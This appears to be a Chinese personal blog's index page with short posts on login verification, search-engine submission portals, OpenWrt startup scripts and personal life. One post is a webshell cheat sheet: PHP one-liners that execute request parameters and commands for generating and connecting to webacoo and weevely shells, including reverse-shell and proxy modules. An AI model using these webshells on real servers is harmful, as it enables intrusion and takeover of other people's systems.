共 106 篇文章 上一页 下一页

还需要对登录验证进行处理

登录验证的程序加密必须要做,而且加密方式要改进,是否采用了本地验证?答案是No,学习百度蔡总cookie的单一key多值判断方法应该更有效,那么,怎么验证用户名?在config里面给用户多加一个当前页面可以生成的用户名md5值,而且最好是提交一次后生成,且和干扰码一起生成,即修改干扰码后,值会变,和密码一样了,是不是再让用户重填一次用户名?不需要,因为用户名是名文的,所以这个新添加的值可以每次自动生成。
标签分类:想法
posted @ 2020-01-06

搜索引擎提交入口

引擎网站收录地址大全
>> 独立博客收录提交网址
>> 英文搜索网站收录地址
>> 网址导航站收录申请登陆口大全
>> 网站管理员工具大全(搜索引擎):
  • (新)好搜站长平台:360推出的站长平台,目前功能有sitemap、官网标注、索引查询、客服电话提交、等等
  • 百度站长平台:站长必备的网站管理员工具,主要服务于百度网页收录的数据提交,国内站长必备。
  • Google网站管理员工具:免费提供网页在Google上展示率详细报告的一个站长在线管理平台,站长可以在此查询站点在Google的索引和排名情况。
  • 搜狗站长平台:功能都差不多,其特色功能有匹配中文站点名、匹配网站favicon,这次搜狗推出站长平台太低调了。
  • Bing网站管理员工具:使用有关搜索查询、爬网和搜索流量的 Bing 数据推动更多访问者访问您的网站。
  • 即刻搜索站长中心:人民网旗下搜索引擎即刻推出的站长平台,目前来说平台功能还稍稍简单。
  • 安全联盟站长平台:主要作用是网站安全检测,漏洞修复,漏洞扫描等功能。
  • Yandex 网站管理工具:Yandex是俄罗斯第一大搜索引擎,也是欧洲第二大流行搜索引擎,创建于1997年。
>> 开放平台注册应用大全:
>> 向搜索引擎递交sitemap大全---网站地图:
网站被K申诉通道
标签分类:搜索引擎提交入口
posted @ 2019-12-30

主被控端应用-几种好用的经典

php经典一句话: <?php echo shell_exec($_GET['cmd']);?>


中国菜刀:
官网:www.maicaidao.co
原理:上传一句话(<?php @eval($_POST['我是密码']);?>)至服务器端,再用中国菜刀客户端(图形化界面)去连接服务器

 

webacoo(kali):
特点:传输的数据包裹在cookie中,并非http包体内,起到一定绕过作用
原理:生成webshell,上传至目标服务器,再拿webacoo去连接该webshell,返回可以执行系统命令的shell
缺点:不可设置专属连接密码
生成webshell: webacoo -g -o a.php
连接webshell: webacoo -t -u http://192.168.1.1/a.php

 

weevely(kali):
原理:生成webshell,上传至目标服务器,再拿weevely去连接该webshell,返回可以执行系统命令的shell
生成webshell:weevely generate 密码 a.php
连接webshell:weevely http://192.168.1.1/a.php 密码
特点:连接到目标服务器webshell后还可以调用内置的N多模块,在shell下输入help查看模块,直接在shell下输入模块名称使用模块

30多个管理模块举例:
1、执行系统命令、浏览文件系统
2、检查服务器常见配置错误
3、创建正向、反向TCP Shell连接
4、将目标服务器作为代理http服务器(肉鸡) ====>只需要在连接到的shell中输入net_proxy即可打开代理,此时会在本地监听127.0.0.1:8080,浏览器设置为该代理后所有流量将走目标服务器
5、从目标计算机运行端口扫描,渗透内网

标签分类:CSDN
posted @ 2019-12-22

有法可依的时候依照法律流程走

在法律法规有相应条款的时候,信访就要排在相关条款之后,先按照已有流程执行,但如果,为难老百姓,这可以对相关部门进行风行投诉。
标签分类:
posted @ 2019-12-18

openwrt添加开机运行脚本

openwrt添加开机运行脚本
1.进入/etc/init.d/目录创建脚本test

vim test

在/etc/init.d/test中按照以下格式编写shell脚本


#!/bin/sh /etc/rc.common
START=99
STOP=15
start() {
 .......

}


START的值决定这个脚本的启动顺序,这里为99
start()里执行增加的功能脚步或者写脚本启动自己的程序
.给脚本添加可执行权限


chmod +x test
创建一个软链接


/etc/init.d/test enable
文件全路径/etc/init.d/test enable的命令实质上是为脚本文件创建一个软链接,软链接存放于/etc/rc.d/下
这时可以看到


/etc/rc.d/目录下可以看到其它的启动脚本和顺序
这样就完成了。
可以在/etc/init.d/目录看脚本自启动状态

for F in /etc/init.d/* ; do $F enabled && echo $F on || echo $F **disabled**; done

执行完命令就看看到自己脚步自启动是on还是off.

参考:https://www.cnblogs.com/milton/p/6345621.html


标签分类:CSDN
posted @ 2019-12-18

复活的斐讯DC1插排

老了,也有了情怀,看到个人项目做了这么个软件,我想他开始的初衷应该不是为了挣钱,当然,不管是不是为了挣钱,但他的行为,很值得尊重,因为真的让失望的人们看到了曙光,虽然App美工确实差强人意,但工具很好用

 DC:4F:22:3E:DF:1F  ae588df429

服务器及客户端下载

标签分类:生活
posted @ 2019-12-16

关于节约这件事

22年前,97元买一个惠普喷墨打印机,感觉像天赐。十年前,599元买一个三合一打印机(喷墨)感觉像捡到了便宜,现在499元能买一个惠普或者三星的激光打印机!但是,我tm却想买一个可以自动双面打印的激光打印机。你真的用的了1000张纸吗(两包)?很可能用不完,但机器淘汰了,那你为什么要多花2箱子纸的价格,而多掏很多钱买自动双面打印机呢?其实答案很简单。18年前,在北京友谊宾馆的一场会上,北大的几位老师让我改变了我对节约的理解,5年前行进在怀柔水库的桥上时让我对节约的理解加深。有人问,你怎么就不知道节约节约钱呢?我节约钱的时候,你还不知道在哪里,但节约自然资源远比节约钱更重要。
标签分类:生活
posted @ 2019-12-10

与梁征12月6日的相约

今天老同学老梁骑着他漂亮的200c军绿铁驴,穿着上万元的意大利三防服,骑行了30多公里来看我,原本计划的是来商量滑雪的事,但因为两天前张家口多次地震,也让我潜意里打消了去张家口滑雪的念头。

本约好的12点吃中饭,结果他家临时有事要让他去劲松取个东西送回家之后才能来,然后他把家里跑腿取货的事也给推了。

出发后快一小时了,从三台山路到我这里骑摩托10~20分钟的路程,我算着差不多了,就穿了个单衣到大院门岗边等着他,真的可以说热情暖心,等了20分钟也没觉得有多冷。但我觉得不对,便给他打了个电话,他说到凉水河了,我有点担心他是不是车没油了,也担心骑摩托太危险是不是出事了。又过了10分钟,他说马上到。我等了他40分钟,整个人都彻底冻透了。心里有点不爽,但至少他能安全过来还是非常激动的。情商低的我虽然我嘴上一直在疑问你怎么骑的这么慢,这40的分钟都去哪了。但我心里知道他肯定是顺便送了一单快递,他也直言不讳的告诉了我他是兼职快递,却没有面对这个脸红的问题回答。脸没红,只是眼睛看其他地方傻笑的搪塞,我也在体质中混过,我也能体会到体质中对人的改变,更何况是一个党委书记的颜面,但这个时候,我能理解他,他也知道我猜到了,这就够了。毕竟男人不易。他更不易。至青春和逐渐变老的我们。

标签分类:生活
posted @ 2019-12-07

共 106 篇文章 上一页 下一页